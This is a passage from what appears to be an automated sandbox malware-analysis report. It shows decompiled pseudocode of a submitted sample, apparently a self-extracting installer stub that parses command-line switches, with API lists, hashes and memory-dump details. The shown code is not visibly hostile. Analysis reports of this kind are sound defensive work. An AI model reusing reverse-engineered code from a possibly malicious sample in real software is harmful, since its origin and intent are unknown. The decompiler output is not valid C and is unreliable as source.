                                                                      					E011D44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                      					 *0x11d9124 = E011D6285();
                                                                      					_t9 = 0;
                                                                      				}
                                                                      				return E011D6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                      			}












                                                                      APIs
                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 011D623F
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                        • Part of subcall function 011D6285: GetLastError.KERNEL32(011D5BBC), ref: 011D6285
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                      • String ID:
                                                                      • API String ID: 381621628-0
                                                                      • Opcode ID: 099b98250402880a373eb15a72b5dafe1abddf6c3bde16b03deb03f903ec091e
                                                                      • Instruction ID: 29b76e207318a8bc491ab7280de14f672cc2d96de826bad42accce3c005e1d14
                                                                      • Opcode Fuzzy Hash: 099b98250402880a373eb15a72b5dafe1abddf6c3bde16b03deb03f903ec091e
                                                                      • Instruction Fuzzy Hash: 46F0BEB06012096BEB68EA749D02FBA33A8DB54304F40007AA986D6081EF749984C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4B60(signed int _a4) {
                                                                      				signed int _t9;
                                                                      				signed int _t15;
                                                                      
                                                                      				_t15 = _a4 * 0x18;
                                                                      				if( *((intOrPtr*)(_t15 + 0x11d8d64)) != 1) {
                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0x11d8d74)); // executed
                                                                      					if(_t9 == 0) {
                                                                      						return _t9 | 0xffffffff;
                                                                      					}
                                                                      					 *((intOrPtr*)(_t15 + 0x11d8d60)) = 1;
                                                                      					return 0;
                                                                      				}
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d60)) = 1;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d68)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d70)) = 0;
                                                                      				 *((intOrPtr*)(_t15 + 0x11d8d6c)) = 0;
                                                                      				return 0;
                                                                      			}






                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,011D4FA1,00000000), ref: 011D4B98
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: eabebae80a0c84b102fcbc16a41090b1c9097e3d8c101e697dc2c9dca8d24a30
                                                                      • Instruction ID: 4642b23f46ef91da8bc20bdb5520bbd2e79844dcba77ff66632cdb8ba14d1e11
                                                                      • Opcode Fuzzy Hash: eabebae80a0c84b102fcbc16a41090b1c9097e3d8c101e697dc2c9dca8d24a30
                                                                      • Instruction Fuzzy Hash: DDF01C31500F0D9EC77DDE2ADC02A5FBBE6ABA5265310092ED46ED25E4E7706441CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D66AE(CHAR* __ecx) {
                                                                      				unsigned int _t1;
                                                                      
                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                      				if(_t1 != 0xffffffff) {
                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                      				} else {
                                                                      					return 0;
                                                                      				}
                                                                      			}





                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(?,011D4777,?,011D4E38,?), ref: 011D66B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: db3fdfdf1bd8ac4c22480c47d0930c8eaab142752635d7c5ae7eb8e7ff1096f3
                                                                      • Instruction ID: b15ec7c5c829275dd9083600374779230432e09ff152698a1f4bcbe5f0368469
                                                                      • Opcode Fuzzy Hash: db3fdfdf1bd8ac4c22480c47d0930c8eaab142752635d7c5ae7eb8e7ff1096f3
                                                                      • Instruction Fuzzy Hash: 5DB09276223440426E29463978295562841AAC123A7E45BA0F032C11D4CB3EC486D104
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4CA0(long _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                      				return _t2;
                                                                      			}





                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 011D4CAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 544948d78c4bf57016b12d6726e7b828dd8686de67c7b21082b7489e07337a3c
                                                                      • Instruction ID: 4bb1b7b123835c3023252dc7f09b2eccadb966bfc6128274be8c8b596f63fe81
                                                                      • Opcode Fuzzy Hash: 544948d78c4bf57016b12d6726e7b828dd8686de67c7b21082b7489e07337a3c
                                                                      • Instruction Fuzzy Hash: FDB0123204520CB7CF102ED2F809F853F1DEFC4761F144010F61C46040CA7294508795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D4CC0(void* _a4) {
                                                                      				void* _t2;
                                                                      
                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                      				return _t2;
                                                                      			}





                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 92%
                                                                      			E011D5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				CHAR* _v265;
                                                                      				char _v266;
                                                                      				char _v267;
                                                                      				char _v268;
                                                                      				CHAR* _v272;
                                                                      				char _v276;
                                                                      				signed int _v296;
                                                                      				char _v556;
                                                                      				signed int _t61;
                                                                      				int _t63;
                                                                      				char _t67;
                                                                      				CHAR* _t69;
                                                                      				signed int _t71;
                                                                      				void* _t75;
                                                                      				char _t79;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      				void* _t87;
                                                                      				intOrPtr _t88;
                                                                      				void* _t100;
                                                                      				intOrPtr _t101;
                                                                      				CHAR* _t104;
                                                                      				intOrPtr _t105;
                                                                      				void* _t111;
                                                                      				void* _t115;
                                                                      				CHAR* _t118;
                                                                      				void* _t119;
                                                                      				void* _t127;
                                                                      				CHAR* _t129;
                                                                      				void* _t132;
                                                                      				void* _t142;
                                                                      				signed int _t143;
                                                                      				CHAR* _t144;
                                                                      				void* _t145;
                                                                      				void* _t146;
                                                                      				void* _t147;
                                                                      				void* _t149;
                                                                      				char _t155;
                                                                      				void* _t157;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      				char _t167;
                                                                      				char _t170;
                                                                      				CHAR* _t173;
                                                                      				void* _t177;
                                                                      				intOrPtr* _t183;
                                                                      				intOrPtr* _t192;
                                                                      				CHAR* _t199;
                                                                      				void* _t200;
                                                                      				CHAR* _t201;
                                                                      				void* _t205;
                                                                      				void* _t206;
                                                                      				int _t209;
                                                                      				void* _t210;
                                                                      				void* _t212;
                                                                      				void* _t213;
                                                                      				CHAR* _t218;
                                                                      				intOrPtr* _t219;
                                                                      				intOrPtr* _t220;
                                                                      				signed int _t221;
                                                                      				signed int _t223;
                                                                      
                                                                      				_t173 = __ecx;
                                                                      				_t61 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t61 ^ _t221;
                                                                      				_push(__ebx);
                                                                      				_push(__esi);
                                                                      				_push(__edi);
                                                                      				_t209 = 1;
                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                      					_t63 = 1;
                                                                      				} else {
                                                                      					L2:
                                                                      					while(_t209 != 0) {
                                                                      						_t67 =  *_t173;
                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                      							_t173 = CharNextA(_t173);
                                                                      							continue;
                                                                      						}
                                                                      						_v272 = _t173;
                                                                      						if(_t67 == 0) {
                                                                      							break;
                                                                      						} else {
                                                                      							_t69 = _v272;
                                                                      							_t177 = 0;
                                                                      							_t213 = 0;
                                                                      							_t163 = 0;
                                                                      							_t202 = 1;
                                                                      							do {
                                                                      								if(_t213 != 0) {
                                                                      									if(_t163 != 0) {
                                                                      										break;
                                                                      									} else {
                                                                      										goto L21;
                                                                      									}
                                                                      								} else {
                                                                      									_t69 =  *_t69;
                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                      										break;
                                                                      									} else {
                                                                      										_t69 = _v272;
                                                                      										L21:
                                                                      										_t155 =  *_t69;
                                                                      										if(_t155 != 0x22) {
                                                                      											if(_t202 >= 0x104) {
                                                                      												goto L106;
                                                                      											} else {
                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                      												_t177 = _t177 + 1;
                                                                      												_t202 = _t202 + 1;
                                                                      												_t157 = 1;
                                                                      												goto L30;
                                                                      											}
                                                                      										} else {
                                                                      											if(_v272[1] == 0x22) {
                                                                      												if(_t202 >= 0x104) {
                                                                      													L106:
                                                                      													_t63 = 0;
                                                                      													L125:
                                                                      													_pop(_t210);
                                                                      													_pop(_t212);
                                                                      													_pop(_t162);
                                                                      													return E011D6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                      												} else {
                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                      													_t177 = _t177 + 1;
                                                                      													_t202 = _t202 + 1;
                                                                      													_t157 = 2;
                                                                      													goto L30;
                                                                      												}
                                                                      											} else {
                                                                      												_t157 = 1;
                                                                      												if(_t213 != 0) {
                                                                      													_t163 = 1;
                                                                      												} else {
                                                                      													_t213 = 1;
                                                                      												}
                                                                      												goto L30;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								goto L131;
                                                                      								L30:
                                                                      								_v272 =  &(_v272[_t157]);
                                                                      								_t69 = _v272;
                                                                      							} while ( *_t69 != 0);
                                                                      							if(_t177 >= 0x104) {
                                                                      								E011D6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                      								asm("int3");
                                                                      								_push(_t221);
                                                                      								_t222 = _t223;
                                                                      								_t71 =  *0x11d8004; // 0xdc3102d5
                                                                      								_v296 = _t71 ^ _t223;
                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                      									0x4f0 = 2;
                                                                      									_t75 = E011D597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                      								} else {
                                                                      									E011D44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                      									 *0x11d9124 = E011D6285();
                                                                      									_t75 = 0;
                                                                      								}
                                                                      								return E011D6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                      							} else {
                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                      								if(_t213 == 0) {
                                                                      									if(_t163 != 0) {
                                                                      										goto L34;
                                                                      									} else {
                                                                      										goto L40;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t163 != 0) {
                                                                      										L40:
                                                                      										_t79 = _v268;
                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                      											if(_t83 == 0) {
                                                                      												_t202 = 0x521;
                                                                      												E011D44B9(0, 0x521, 0x11d1140, 0, 0x40, 0);
                                                                      												_t85 =  *0x11d8588; // 0x0
                                                                      												if(_t85 != 0) {
                                                                      													CloseHandle(_t85);
                                                                      												}
                                                                      												ExitProcess(0);
                                                                      											}
                                                                      											_t87 = _t83 - 4;
                                                                      											if(_t87 == 0) {
                                                                      												if(_v266 != 0) {
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t215 =  &_v268 + _t167;
                                                                      														_t183 =  &_v268 + _t167;
                                                                      														_t50 = _t183 + 1; // 0x1
                                                                      														_t202 = _t50;
                                                                      														do {
                                                                      															_t88 =  *_t183;
                                                                      															_t183 = _t183 + 1;
                                                                      														} while (_t88 != 0);
                                                                      														if(_t183 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t205 = 0x5b;
                                                                      															if(E011D667F(_t215, _t205) == 0) {
                                                                      																L115:
                                                                      																_t206 = 0x5d;
                                                                      																if(E011D667F(_t215, _t206) == 0) {
                                                                      																	L117:
                                                                      																	_t202 =  &_v276;
                                                                      																	_v276 = _t167;
                                                                      																	if(E011D5C17(_t215,  &_v276) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		_t202 = 0x104;
                                                                      																		E011D1680(0x11d8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                      																	}
                                                                      																} else {
                                                                      																	_t202 = 0x5b;
                                                                      																	if(E011D667F(_t215, _t202) == 0) {
                                                                      																		goto L49;
                                                                      																	} else {
                                                                      																		goto L117;
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																_t202 = 0x5d;
                                                                      																if(E011D667F(_t215, _t202) == 0) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	goto L115;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													 *0x11d8a24 = 1;
                                                                      												}
                                                                      												goto L50;
                                                                      											} else {
                                                                      												_t100 = _t87 - 1;
                                                                      												if(_t100 == 0) {
                                                                      													L98:
                                                                      													if(_v266 != 0x3a) {
                                                                      														goto L49;
                                                                      													} else {
                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                      														_t217 =  &_v268 + _t170;
                                                                      														_t192 =  &_v268 + _t170;
                                                                      														_t38 = _t192 + 1; // 0x1
                                                                      														_t202 = _t38;
                                                                      														do {
                                                                      															_t101 =  *_t192;
                                                                      															_t192 = _t192 + 1;
                                                                      														} while (_t101 != 0);
                                                                      														if(_t192 == _t202) {
                                                                      															goto L49;
                                                                      														} else {
                                                                      															_t202 =  &_v276;
                                                                      															_v276 = _t170;
                                                                      															if(E011D5C17(_t217,  &_v276) == 0) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t104 = CharUpperA(_v267);
                                                                      																_t218 = 0x11d8b3e;
                                                                      																_t105 = _v276;
                                                                      																if(_t104 != 0x54) {
                                                                      																	_t218 = 0x11d8a3a;
                                                                      																}
                                                                      																E011D1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                      																_t202 = 0x104;
                                                                      																E011D658A(_t218, 0x104, 0x11d1140);
                                                                      																if(E011D31E0(_t218) != 0) {
                                                                      																	goto L50;
                                                                      																} else {
                                                                      																	goto L106;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													_t111 = _t100 - 0xa;
                                                                      													if(_t111 == 0) {
                                                                      														if(_v266 != 0) {
                                                                      															if(_v266 != 0x3a) {
                                                                      																goto L49;
                                                                      															} else {
                                                                      																_t199 = _v265;
                                                                      																if(_t199 != 0) {
                                                                      																	_t219 =  &_v265;
                                                                      																	do {
                                                                      																		_t219 = _t219 + 1;
                                                                      																		_t115 = CharUpperA(_t199) - 0x45;
                                                                      																		if(_t115 == 0) {
                                                                      																			 *0x11d8a2c = 1;
                                                                      																		} else {
                                                                      																			_t200 = 2;
                                                                      																			_t119 = _t115 - _t200;
                                                                      																			if(_t119 == 0) {
                                                                      																				 *0x11d8a30 = 1;
                                                                      																			} else {
                                                                      																				if(_t119 == 0xf) {
                                                                      																					 *0x11d8a34 = 1;
                                                                      																				} else {
                                                                      																					_t209 = 0;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																		_t118 =  *_t219;
                                                                      																		_t199 = _t118;
                                                                      																	} while (_t118 != 0);
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															 *0x11d8a2c = 1;
                                                                      														}
                                                                      														goto L50;
                                                                      													} else {
                                                                      														_t127 = _t111 - 3;
                                                                      														if(_t127 == 0) {
                                                                      															if(_v266 != 0) {
                                                                      																if(_v266 != 0x3a) {
                                                                      																	goto L49;
                                                                      																} else {
                                                                      																	_t129 = CharUpperA(_v265);
                                                                      																	if(_t129 == 0x31) {
                                                                      																		goto L76;
                                                                      																	} else {
                                                                      																		if(_t129 == 0x41) {
                                                                      																			goto L83;
                                                                      																		} else {
                                                                      																			if(_t129 == 0x55) {
                                                                      																				goto L76;
                                                                      																			} else {
                                                                      																				goto L49;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															} else {
                                                                      																L76:
                                                                      																_push(2);
                                                                      																_pop(1);
                                                                      																L83:
                                                                      																 *0x11d8a38 = 1;
                                                                      															}
                                                                      															goto L50;
                                                                      														} else {
                                                                      															_t132 = _t127 - 1;
                                                                      															if(_t132 == 0) {
                                                                      																if(_v266 != 0) {
                                                                      																	if(_v266 != 0x3a) {
                                                                      																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                      																			goto L49;
                                                                      																		}
                                                                      																	} else {
                                                                      																		_t201 = _v265;
                                                                      																		 *0x11d9a2c = 1;
                                                                      																		if(_t201 != 0) {
                                                                      																			_t220 =  &_v265;
                                                                      																			do {
                                                                      																				_t220 = _t220 + 1;
                                                                      																				_t142 = CharUpperA(_t201) - 0x41;
                                                                      																				if(_t142 == 0) {
                                                                      																					_t143 = 2;
                                                                      																					 *0x11d9a2c =  *0x11d9a2c | _t143;
                                                                      																					goto L70;
                                                                      																				} else {
                                                                      																					_t145 = _t142 - 3;
                                                                      																					if(_t145 == 0) {
                                                                      																						 *0x11d8d48 =  *0x11d8d48 | 0x00000040;
                                                                      																					} else {
                                                                      																						_t146 = _t145 - 5;
                                                                      																						if(_t146 == 0) {
                                                                      																							 *0x11d9a2c =  *0x11d9a2c & 0xfffffffd;
                                                                      																							goto L70;
                                                                      																						} else {
                                                                      																							_t147 = _t146 - 5;
                                                                      																							if(_t147 == 0) {
                                                                      																								 *0x11d9a2c =  *0x11d9a2c & 0xfffffffe;
                                                                      																								goto L70;
                                                                      																							} else {
                                                                      																								_t149 = _t147;
                                                                      																								if(_t149 == 0) {
                                                                      																									 *0x11d8d48 =  *0x11d8d48 | 0x00000080;
                                                                      																								} else {
                                                                      																									if(_t149 == 3) {
                                                                      																										 *0x11d9a2c =  *0x11d9a2c | 0x00000004;
                                                                      																										L70:
                                                                      																										 *0x11d8a28 = 1;
                                                                      																									} else {
                                                                      																										_t209 = 0;
                                                                      																									}
                                                                      																								}
                                                                      																							}
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				_t144 =  *_t220;
                                                                      																				_t201 = _t144;
                                                                      																			} while (_t144 != 0);
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	 *0x11d9a2c = 3;
                                                                      																	 *0x11d8a28 = 1;
                                                                      																}
                                                                      																goto L50;
                                                                      															} else {
                                                                      																if(_t132 == 0) {
                                                                      																	goto L98;
                                                                      																} else {
                                                                      																	L49:
                                                                      																	_t209 = 0;
                                                                      																	L50:
                                                                      																	_t173 = _v272;
                                                                      																	if( *_t173 != 0) {
                                                                      																		goto L2;
                                                                      																	} else {
                                                                      																		break;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											goto L106;
                                                                      										}
                                                                      									} else {
                                                                      										L34:
                                                                      										_t209 = 0;
                                                                      										break;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L131;
                                                                      					}
                                                                      					if( *0x11d8a2c != 0 &&  *0x11d8b3e == 0) {
                                                                      						if(GetModuleFileNameA( *0x11d9a3c, 0x11d8b3e, 0x104) == 0) {
                                                                      							_t209 = 0;
                                                                      						} else {
                                                                      							_t202 = 0x5c;
                                                                      							 *((char*)(E011D66C8(0x11d8b3e, _t202) + 1)) = 0;
                                                                      						}
                                                                      					}
                                                                      					_t63 = _t209;
                                                                      				}
                                                                      				L131:
                                                                      			}

                                                                      0x011d5ffd
                                                                      0x011d6003
                                                                      0x011d6006
                                                                      0x011d6011
                                                                      0x011d6014
                                                                      0x011d603d
                                                                      0x011d6016
                                                                      0x011d6018
                                                                      0x011d6019
                                                                      0x011d601b
                                                                      0x011d6033
                                                                      0x011d601d
                                                                      0x011d6020
                                                                      0x011d6029
                                                                      0x011d6022
                                                                      0x011d6022
                                                                      0x011d6022
                                                                      0x011d6020
                                                                      0x011d601b
                                                                      0x011d6042
                                                                      0x011d6044
                                                                      0x011d6046
                                                                      0x011d604a
                                                                      0x011d5ff7
                                                                      0x011d5fd5
                                                                      0x011d5fd8
                                                                      0x011d5fd8
                                                                      0x00000000
                                                                      0x011d5e6b
                                                                      0x011d5e6b
                                                                      0x011d5e6e
                                                                      0x011d5f8b
                                                                      0x011d5f99
                                                                      0x00000000
                                                                      0x011d5f9f
                                                                      0x011d5fa7
                                                                      0x011d5faf
                                                                      0x00000000
                                                                      0x011d5fb1
                                                                      0x011d5fb3
                                                                      0x00000000
                                                                      0x011d5fb5
                                                                      0x011d5fb7
                                                                      0x00000000
                                                                      0x011d5fb9
                                                                      0x00000000
                                                                      0x011d5fb9
                                                                      0x011d5fb7
                                                                      0x011d5fb3
                                                                      0x011d5faf
                                                                      0x011d5f8d
                                                                      0x011d5f8d
                                                                      0x011d5f8d
                                                                      0x011d5f8f
                                                                      0x011d5fc1
                                                                      0x011d5fc1
                                                                      0x011d5fc1
                                                                      0x00000000
                                                                      0x011d5e74
                                                                      0x011d5e74
                                                                      0x011d5e77
                                                                      0x011d5ea0
                                                                      0x011d5ebd
                                                                      0x011d5f79
                                                                      0x00000000
                                                                      0x011d5f7f
                                                                      0x011d5ec3
                                                                      0x011d5ec3
                                                                      0x011d5ecc
                                                                      0x011d5ed4
                                                                      0x011d5ed6
                                                                      0x011d5edc
                                                                      0x011d5edf
                                                                      0x011d5eea
                                                                      0x011d5eed
                                                                      0x011d5f3f
                                                                      0x011d5f40
                                                                      0x00000000
                                                                      0x011d5eef
                                                                      0x011d5eef
                                                                      0x011d5ef2
                                                                      0x011d5f34
                                                                      0x011d5ef4
                                                                      0x011d5ef4
                                                                      0x011d5ef7
                                                                      0x011d5f2b
                                                                      0x00000000
                                                                      0x011d5ef9
                                                                      0x011d5ef9
                                                                      0x011d5efc
                                                                      0x011d5f22
                                                                      0x00000000
                                                                      0x011d5efe
                                                                      0x011d5eff
                                                                      0x011d5f02
                                                                      0x011d5f16
                                                                      0x011d5f04
                                                                      0x011d5f07
                                                                      0x011d5f0d
                                                                      0x011d5f46
                                                                      0x011d5f46
                                                                      0x011d5f09
                                                                      0x011d5f09
                                                                      0x011d5f09
                                                                      0x011d5f07
                                                                      0x011d5f02
                                                                      0x011d5efc
                                                                      0x011d5ef7
                                                                      0x011d5ef2
                                                                      0x011d5f4c
                                                                      0x011d5f4e
                                                                      0x011d5f50
                                                                      0x011d5f54
                                                                      0x011d5ed4
                                                                      0x011d5ea2
                                                                      0x011d5ea4
                                                                      0x011d5eaf
                                                                      0x011d5eaf
                                                                      0x00000000
                                                                      0x011d5e79
                                                                      0x011d5e7d
                                                                      0x00000000
                                                                      0x011d5e83
                                                                      0x011d5e83
                                                                      0x011d5e83
                                                                      0x011d5e85
                                                                      0x011d5e85
                                                                      0x011d5e8e
                                                                      0x00000000
                                                                      0x011d5e94
                                                                      0x00000000
                                                                      0x011d5e94
                                                                      0x011d5e8e
                                                                      0x011d5e7d
                                                                      0x011d5e77
                                                                      0x011d5e6e
                                                                      0x011d5e65
                                                                      0x011d5e5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x011d5dd0
                                                                      0x011d5dd0
                                                                      0x011d5dd0
                                                                      0x00000000
                                                                      0x011d5dd0
                                                                      0x011d5dce
                                                                      0x011d5dca
                                                                      0x011d5dba
                                                                      0x00000000
                                                                      0x011d5d00
                                                                      0x011d5dd9
                                                                      0x011d5e04
                                                                      0x011d61fe
                                                                      0x011d5e0a
                                                                      0x011d5e0c
                                                                      0x011d5e17
                                                                      0x011d5e17
                                                                      0x011d5e04
                                                                      0x011d6200
                                                                      0x011d6200
                                                                      0x00000000

                                                                      APIs
                                                                      • CharNextA.USER32(?,00000000,?,?), ref: 011D5CEE
                                                                      • GetModuleFileNameA.KERNEL32(011D8B3E,00000104,00000000,?,?), ref: 011D5DFC
                                                                      • CharUpperA.USER32(?), ref: 011D5E3E
                                                                      • CharUpperA.USER32(-00000052), ref: 011D5EE1
                                                                      • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 011D5F6F
                                                                      • CharUpperA.USER32(?), ref: 011D5FA7
                                                                      • CharUpperA.USER32(-0000004E), ref: 011D6008
                                                                      • CharUpperA.USER32(?), ref: 011D60AA
                                                                      • CloseHandle.KERNEL32(00000000,011D1140,00000000,00000040,00000000), ref: 011D61F1
                                                                      • ExitProcess.KERNEL32 ref: 011D61F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                      • String ID: "$"$:$RegServer
                                                                      • API String ID: 1203814774-25366791
                                                                      • Opcode ID: 197b8c08f1d4480a067e0bc1101e8bb9c6db6a28c3e4ff0bec0f8e9958fd30d1
